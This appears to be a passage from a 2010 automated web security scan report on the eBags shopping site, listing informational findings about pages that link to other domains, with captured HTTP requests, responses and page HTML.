><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/125538_3_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=280&wid=280" height="280" width="280" data-ipsid="125538_3_1" border="0" /></a>
</div>
<div class="md-pad10">
<img class="iconImage" src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/125538_1_2?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=40&wid=40" data-ipsid="125538_1_2" />
<img class="iconImage" src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/125538_1_3?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=40&wid=40" data-ipsid="125538_1_3" />
<img class="iconImage" src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/125538_1_4?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=40&wid=40" data-ipsid="125538_1_4" />
<img class="iconImage" src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/125538_1_5?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=40&wid=40" data-ipsid="125538_1_5" />
<img class="iconImage" src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/125538_1_6?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=40&wid=40" data-ipsid="125538_1_6" />
<img class="iconImage" src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/125538_1_7?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=40&wid=40" data-ipsid="125538_1_7" />
</div>
...[SNIP]...
<a href="/brand/ebags"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logos/logo_222.gif" /></a>
...[SNIP]...
<div class="productThumb"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/125538_5_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55" alt="eBags Mother Lode TLS Mini 21'' Wheeled Duffel Blue Yonder" height="55" width="55" class="iconImage skuImage" data-ipsid="125538_5_1" data-skuid="1325216"></div>
<div class="productThumb"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/125538_1_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55" alt="eBags Mother Lode TLS Mini 21'' Wheeled Duffel Pitch Black" height="55" width="55" class="iconImage skuImage" data-ipsid="125538_1_1" data-skuid="1325212"></div>
<div class="productThumb"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/125538_4_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55" alt="eBags Mother Lode TLS Mini 21'' Wheeled Duffel Sinful Red" height="55" width="55" class="iconImage skuImage" data-ipsid="125538_4_1" data-skuid="1325215"></div>
<div class="productThumb productThumb_select"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/125538_3_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55" alt="eBags Mother Lode TLS Mini 21'' Wheeled Duffel Green Envy" height="55" width="55" class="iconImage skuImage" data-ipsid="125538_3_1" data-skuid="1325214"></div>
...[SNIP]...
<div class="icon-sendtoafriend"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/icon-sendtoafriend.gif" alt="Send to a Friend" /></div>
...[SNIP]...
<br />
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.ebags.com%2fproduct%2febags%2fmother-lode-tls-mini-21-wheeled-duffel%2f125538&amp;layout=standard&amp;show_faces=true&amp;width=340&amp;action=like&amp;font=arial&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:340px; height:25px;" allowTransparency="true"></iframe>
...[SNIP]...
<a href="#" onclick="javascript:openSesame('/info/index.cfm?FuseAction=BOTB','Info','no','300','250','no','no','no','111','111'); return false;"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/icon-botb.gif" /></a><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/icon-lifetime.gif" /><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/icon-carryon.gif" />
</div>
...[SNIP]...
</script>
<a id="_lpChatBtn" href='https://sales.liveperson.net/hc/16136262/?cmd=file&file=visitorWantsToChat&site=16136262'
target='chat16136262' onclick="javascript:window.open('https://sales.liveperson.net/hc/16136262/?cmd=file&file=visitorWantsToChat&site=16136262&referrer='+escape(document.location),'chat16136262','width=475,height=400,resizable=yes');return false;">

<span class="help-icon">
...[SNIP]...
<div id="lp-Ebags-WorldClassService-div">
<img src='http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/reponline.gif' name='' border="0" /></div>
...[SNIP]...
<span class="help-icon">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpPhone.png" width="70"
height="47" border="0" alt="Call Us 24/7" />
</span>
...[SNIP]...
<span class="help-icon">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpEmail.png" width="70"
height="50" border="0" alt="Email" />
</span>
...[SNIP]...
<span class="help-icon">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpFAQ.png" width="70" height="56"
border="0" alt="FAQ'S" />
</span>
...[SNIP]...
<span class="help-icon">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpSuggest.png" width="70"
height="53" border="0" alt="Have a Suggestion?" />
</span>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsdown.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<a href="/info/ratings/index.cfm?fuseaction=enter&modelid=125538&testimonial_link=write_your_own"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/btn-writeownreview.gif" /></a>
...[SNIP]...
<a href="#"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/btn-backtotop.gif" width="96" height="22" alt="Back to top" /></a>
...[SNIP]...
<li><a href="http://www.facebook.com/eBags" id="fb">Join Us on Facebook</a>
...[SNIP]...
<li><a href="http://twitter.com/eBagsOnline" id="twit">Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://www.ebagscorporate.com/">Corporate Sales</a>
...[SNIP]...
<div style="padding-top:10px;"><a href="http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com" target="_blank"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif" width="61" height="39" border="0" alt="Stella Service Elite" /></a>
...[SNIP]...
<a href="javascript:openSesame('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=www.ebags.com&lang=en','Security','no','500','450','no','yes','no','111','111')"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif" width="100" height="72" border="0"></a></div>
<div><a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com"><img width="65" height="37" border="0" src="//images.scanalert.com/meter/survey/www.ebags.com/63.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
</div>


<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.productDetail.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dataTables.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.validation.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.deviceBagFinder.min.js?ver=1'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/jquery.validate.min.js'></script>
...[SNIP]...

4.16. http://www.ebags.com/products/view/ZoomColorsViews.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /products/view/ZoomColorsViews.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /products/view/ZoomColorsViews.cfm?fuseaction=imagePop&ModelID=120830&ipsid=120830_3_1 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:16:12 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:16:12 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Content-Length: 9136


<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<link rel="stylesheet" href="/style_IE.css" type="text/css">
<script language="JavaScript" type="text/javascript">
v
...[SNIP]...
<td valign="top" class="copy" width="109" height="70">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/eblogo.gif" width="109" height="62" alt="eBags" border="0">
<br>
...[SNIP]...
<a href="#" onclick="BuildFlash('120830_1_1', 'true', 'true', '1');return false;">
<img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=60&wid=60" width="25" height="25" style="border: 1px solid #ccc"></a>
<a href="#" onclick="BuildFlash('120830_2_1', 'true', 'true', '1');return false;">
<img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_2_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=60&wid=60" width="25" height="25" style="border: 1px solid #ccc"></a>
<a href="#" onclick="BuildFlash('120830_3_1', 'true', 'true', '1');return false;">
<img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_3_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=60&wid=60" width="25" height="25" style="border: 1px solid #ccc"></a>
...[SNIP]...
<a href="#" onclick="BuildFlash('120830_1_2', 'true', 'true', '1'); return false;"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_1_2?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=40&wid=40"
width="40" height="40" alt="Product Image" hspace="4" vspace="5" border="0">
</a>
<a href="#" onclick="BuildFlash('120830_1_3', 'true', 'true', '1'); return false;"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_1_3?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=40&wid=40"
width="40" height="40" alt="Product Image" hspace="4" vspace="5" border="0">
</a>
...[SNIP]...
</div>
<img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_2_1?&op_usm=1,1,1&hei=460&wid=460" id="mnImg" style="display:none;">
</td>
...[SNIP]...

4.17. http://www.ebags.com/rewards/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /rewards/index.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /rewards/index.cfm?fuseaction=signup HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:03:00 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:03:00 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 43464


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="icon" type="image/x-icon" />
<meta http-equiv="P3P" content='policyref="http://www.ebags.com/w3c/p3p.xml"'>
...[SNIP]...
<a href="http://www.ebags.com/">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif" border=0 alt=" HOME - luggage, handbags, backpacks, bags and travel accessories">
</a>
...[SNIP]...
<a href="#" class="helpLink"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif" alt="Need Help?" /></a>
...[SNIP]...
<a href="#" id="lnkDealOfDay" title="eBags Steal of the Day - one incredible deal, every day"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif" alt="Steal of the Day" border="0"></a>
...[SNIP]...
</a>
| <a href="http://ebags.liveclicker.com" class="headerLinkStyle" title="eBags Videos - View hundreds of helpful product videos">Video</a>
...[SNIP]...
<a href="#" onclick=" window.open('/blocks/dsp_non_discountable_brands.cfm','p2','height=750,width=300,scrollbars,resizable');return false" title="An extra 10%* off + Free Shipping Over $50"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif" width=960 height="40" border=0>
</a>
...[SNIP]...
<div class="content-rewards">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/2010-1028-Header-Rewards.jpg" alt="eBags Rewards Club" border=0 />
<h3>
...[SNIP]...
<li><a href="http://www.facebook.com/eBags" id="fb">Join Us on Facebook</a>
...[SNIP]...
<li><a href="http://twitter.com/eBagsOnline" id="twit">Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://www.ebagscorporate.com/">Corporate Sales</a>
...[SNIP]...
<div style="padding-top:10px;"><a href="http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com" target="_blank"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif" width="61" height="39" border="0" alt="Stella Service Elite" /></a>
...[SNIP]...
<a href="javascript:openSesame('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=www.ebags.com&lang=en','Security','no','500','450','no','yes','no','111','111')"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif" width="100" height="72" border="0"></a></div>
<div><a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com"><img width="65" height="37" border="0" src="//images.scanalert.com/meter/survey/www.ebags.com/63.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
</div>


<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
...[SNIP]...

4.18. http://www.ebags.com/shoppingcart/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /shoppingcart/index.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /shoppingcart/index.cfm?FuseAction=viewcart&CurrentTime=12%2f26%2f2010+6%3a55%3a59+AM&requesttimeout=9000&itemAdded=true HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 16:26:07 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID; expires=Sun, 02-Jan-2011 16:26:07 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 53790


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="icon" type="image/x-icon" />
<meta http-equiv="P3P" content='policyref="http://www.ebags.com/w3c/p3p.xml"'>
...[SNIP]...
<a href="http://www.ebags.com/">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif" border=0 alt=" HOME - luggage, handbags, backpacks, bags and travel accessories">
</a>
...[SNIP]...
<a href="#" class="helpLink"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif" alt="Need Help?" /></a>
...[SNIP]...
<a href="#" id="lnkDealOfDay" title="eBags Steal of the Day - one incredible deal, every day"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif" alt="Steal of the Day" border="0"></a>
...[SNIP]...
</a>
| <a href="http://ebags.liveclicker.com" class="headerLinkStyle" title="eBags Videos - View hundreds of helpful product videos">Video</a>
...[SNIP]...
<a href="#" onclick=" window.open('/blocks/dsp_non_discountable_brands.cfm','p2','height=750,width=300,scrollbars,resizable');return false" title="An extra 10%* off + Free Shipping Over $50"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif" width=960 height="40" border=0>
</a>
...[SNIP]...
<a href="/handbags/department/index.cfm?sub_site_id=14"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/NSR_01.jpg" alt="Handbags" border="0"></a>
...[SNIP]...
<a href="/luggage/department/index.cfm?sub_site_id=16"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/NSR_02.jpg" alt="Luggage" border="0"></a>
...[SNIP]...
<a href="/business_cases/department/index.cfm?sub_site_id=25"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/NSR_03.jpg" alt="Business & Laptops" border="0"></a>
...[SNIP]...
<a href="/backpacks/department/index.cfm?sub_site_id=10"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/NSR_04.jpg" alt="Backpacks" border="0"></a>
...[SNIP]...
<a href="/urban_gear/department/index.cfm?sub_site_id=21"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/NSR_05.jpg" alt="Messengers" border="0"></a>
...[SNIP]...
<a href="/travel_accessories/department/index.cfm?sub_site_id=24"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/NSR_06.jpg" alt="Travel Accessories" border="0"></a>
...[SNIP]...
<a href="/product/ebags/weekender-etech-convertible/15026?productid=56582&rlid=search_no&rcode=res10122608330606111013612" title="eBags Weekender eTech Convertible Backpacks">
<img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im6/15026_2_1?&op_sharpen=1&op_usm=1,1,1&qlt=60&hei=115&wid=115" border="0" height=115 width=115 alt="eBags Weekender eTech Convertible Backpacks"></a>
...[SNIP]...
="/product/ebags/value-set-mother-lode-mini-firewall-brief/106975?productid=1281995&rlid=search_no&rcode=res10122608330606111013612" title="eBags Value Set: Mother Lode Mini + Firewall Brief Luggage">
<img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im5/106975_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=60&hei=115&wid=115" border="0" height=115 width=115 alt="eBags Value Set: Mother Lode Mini + Firewall Brief Luggage"></a>
...[SNIP]...
"/product/ebags/mother-lode-tls-junior-25-wheeled-duffel/125548?productid=1325229&rlid=search_no&rcode=res10122608330606111013612" title="eBags Mother Lode TLS Junior 25&quot; Wheeled Duffel Luggage">
<img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/125548_3_1?&op_sharpen=1&op_usm=1,1,1&qlt=60&hei=115&wid=115" border="0" height=115 width=115 alt="eBags Mother Lode TLS Junior 25&quot; Wheeled Duffel Luggage"></a>
...[SNIP]...
f="/product/ebags/mother-lode-etech-mini-21-wheeled-duffel/68256?productid=837488&rlid=search_no&rcode=res10122608330606111013612" title="eBags Mother Lode eTech Mini 21&quot; Wheeled Duffel Luggage">
<img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im6/68256_2_1?&op_sharpen=1&op_usm=1,1,1&qlt=60&hei=115&wid=115" border="0" height=115 width=115 alt="eBags Mother Lode eTech Mini 21&quot; Wheeled Duffel Luggage"></a>
...[SNIP]...
<li><a href="http://www.facebook.com/eBags" id="fb">Join Us on Facebook</a>
...[SNIP]...
<li><a href="http://twitter.com/eBagsOnline" id="twit">Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://www.ebagscorporate.com/">Corporate Sales</a>
...[SNIP]...
<div style="padding-top:10px;"><a href="http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com" target="_blank"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif" width="61" height="39" border="0" alt="Stella Service Elite" /></a>
...[SNIP]...
<a href="javascript:openSesame('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=www.ebags.com&lang=en','Security','no','500','450','no','yes','no','111','111')"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif" width="100" height="72" border="0"></a></div>
<div><a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com"><img width="65" height="37" border="0" src="//images.scanalert.com/meter/survey/www.ebags.com/63.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
</div>


<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
